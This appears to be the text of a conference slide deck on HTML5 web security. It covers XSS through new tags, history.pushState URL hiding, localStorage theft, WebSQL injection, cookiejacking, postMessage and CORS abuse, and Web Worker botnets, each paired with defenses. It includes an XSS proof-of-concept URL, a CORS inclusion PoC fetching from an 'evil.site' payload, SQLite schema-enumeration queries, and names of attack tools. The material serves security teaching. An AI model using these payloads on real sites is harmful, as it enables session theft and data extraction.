talk about html5 security

youstar@insight-labs

Introduction to HTML5

HTML5 threat model

Vulnerabilities & Defense

Tools

Reference

History HTML1.0——1993.6 Not Standard

HTML 2.0——1995.11 RFC 1866

HTML 3.2——1996.1.14 W3C Recommended Standard

HTML 4.0——1997.12.18 W3C Recommended Standard

HTML 4.01——1999.12.24 W3C Recommended Standard

XHTML——2000.1.20 W3C Recommended Standard

HTML5——2008 First Draft Standard

2012 W3C Candidate Recommendation

Features

The three aspects of HTML5

Content HTML New Tags and Attributes

Presentation of content CSS

Interaction with content JavaScript Add New API Drag LocalStorage WebWorkers etc

Features

XSS abuse with tags and attributes

Hiding URL Code

Stealing from the storage

Injecting and Exploiting WebSQL

ClickJacking &&CookieJacking

Cross Origin Request and postMessage

Client‐side File Includes

Botnet and widgets

In: New tags: <button>,<video>,<audio>,<article>,<footer>,<nav> New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for

input New media events New <canvas> tag for 2D rendering New form controls for date and time Geolocation New selectors Client-side storage including localStorage, sessionStorage, and WebSQL

Out: Presentation elements such a <font>, <center> Presentation attributes including align, border <frame>,<frameset> <applet> Old special effects: <marquee>,<bgsound> <noscript>

Attack:

New XSS Vector

Bypass Black-list Filter

Defense:

Add new tags to Black-list

Change Regex

DOM window.history.back();

window.history.forward();

window.history.go(); HTML5 history.pushState() history.pushState(state object,title,URL);

history.replaceState() The same with pushState,but modifies the current

history entry.

http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState(,'',location.href.split("?").shift());document.write(1)</script>

http://127.0.0.1/html5/poc/history/xsspoc.php

Type LocalStorage：for long-term storage

SessionStorage：for the session application(last when the browser closed)

Differences Cookies：4k

LocalStorage/ SessionStorage：depends on browser(usually 5MB)

Support Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera

10.50

Function (localStorage | sessionStorage).setItem()

(localStorage | sessionStorage).getItem()

(localStorage | sessionStorage).deleteItem()

(localStorage | sessionStorage).clear()

Attack

Get the data from the storage(cookie,passwd,etc)

Storage your xss shellcode

Unlimit the path

Defense

Don’t store sensitive data in local storage

Don't use local storage for session identifiers

Stick with cookies and use the HTTPOnly and Secure flags

Database Storage

The same as the Google Gears

Operate openDatabase("Database Name", "Database Version", "Database

Description", "Estimated Size");

transaction("YOUR SQL STATEMENT HERE");

executeSql();

Type

SQLite (support by WebKit)

Attack

Store shellcode

SQL inject

Defense

Strick with the sql operate

Encode the sql result before display

Don’t store sensitive data

Store shellcode

SQL Injection Use sqlite_master SELECT name FROM sqlite_master WHERE type='table'

SELECT sql FROM sqlite_master WHERE name='table_name'

SELECT sqlite_version()

Select with ? executeSql("SELECT name FROM stud WHERE id=" +

input_id); False

executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True

Drag and drop basics Drag Data the drag feedback image drag effects

Drag events: dragstart dragenter dragover dragleave drag drop dragend

ClickJacking

XSS + Drag

CookieJacking

Use many technology to steal user’s local cookies

Technology

How to read the local fileiframe+file://

How to detect the state of cookies Clickjacking

How to send cookiesSMB

Defense

Use iframe with sandbox

If (top !== window) top.location= window.location.href;

if (top!=self) top.location.href=self.location.href

postMessage

Send

otherWindow.postMessage(message, targetOrigin);

Receive

window.addEventListener("message", receiveMessage, false);

function receiveMessage(event)

if (event.origin !== "http://example.org:8080")

return;

// ...

Defense

Check the postMessage origin

Don’t use innerHTML

Element.innerHTML=e.data;//danger

Element.textContent=e.data;//safe

Don’t use Eval to deal with the mesage

Cross-Origin Resource Sharing

Originally Ajax calls were subject to Same Origin Policy

Site A cannot make XMLHttpRequests to Site B

HTML5 makes it possible to make these cross domain calls

Site ASite B(Response must include a header)

Access-Control-Allow-Origin: Site A Must

Access-Control-Allow-Credentials: true | false

Access-Control-Expose-Headers:

etc

Defense

Don’t set this: Access-Control-Allow-Origin: *

（Flash crossdomain.xml ）

Prevent DDOS

if(origin=="Site A")header(Access-Control-Allow-Origin:Site A)……//process request

Code like this: <html><body><script>

x = new XMLHttpRequest();

x.open("GET",location.hash.substring(1));

x.onreadystatechange=function()if(x.readyState==4)

document.getElementById("main").innerHTML=x.responseText;

x.send();

</script>

<div id=“main”></div>

</body></html>

POC

Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php

VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>

New type of XSS!!

Web Workers

running scripts in the background independently

Very simple var w = new Worker("some_script.js");

w.onmessage = function(e) // do something ;

w.terminate()

Access XHR,navigator object,application cache,spawn other workers!

Can’t access

DOM,window,document objects

Attack

Botnet

Application‐level DDoS attacks

Email Spam

Distributed password cracking

Network Scanning

Guessing User’s Private IP Address

Identify the user’s subnet

Identify the IP address

COR+XSS+Workers=shell of the future

HTML5CSdump

enumeration and extraction techniques described before to obtain all the client-side storage relative to a certain domain name

JS-Recon

Port Scans

Network Scans

Detecting private IP address

Imposter Steal cookies

Set cookies

Steal Local Shared Objects

Steal stored passwords from FireFox

etc Shell of the Future Reverse Web Shell handler

Bypass anti-session hijacking measures

Ravan

JavaScript based Distributed Computing system

hashing algorithms

MD5

SHA1

SHA256

SHA512

HTML5 带来的新安全威胁:xisigr Attacking with HTML5:lavakumark Abusing HTML5:Ming Chow HTML5 Web Security:Thomas Röthlisberger Abusing HTML 5 Structured Client-side Storage:Alberto Trivero

Cookiejacking：Rosario Valotta http://heideri.ch/jso/#html5 http://www.wooyun.org/bugs/wooyun-2011-02351 http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-

dom-l3-top-10-attacks.html http://www.html5test.com

http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html

http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox http://code.google.com/intl/zh-CN/apis/gears/api_database.html http://michael-coates.blogspot.com/2010/07/html5-local-storage-

and-xss.html http://www.w3.org/TR/access-control/ http://m-austin.com/blog/?p=19 https://developer.mozilla.org/en/ http://www.w3.org/TR/cors/ http://www.andlabs.org/tools/ravan.html http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/

Contact Me

email:youstar@foxmail.com

Site:

www.codesec.info

www.insight-labs.org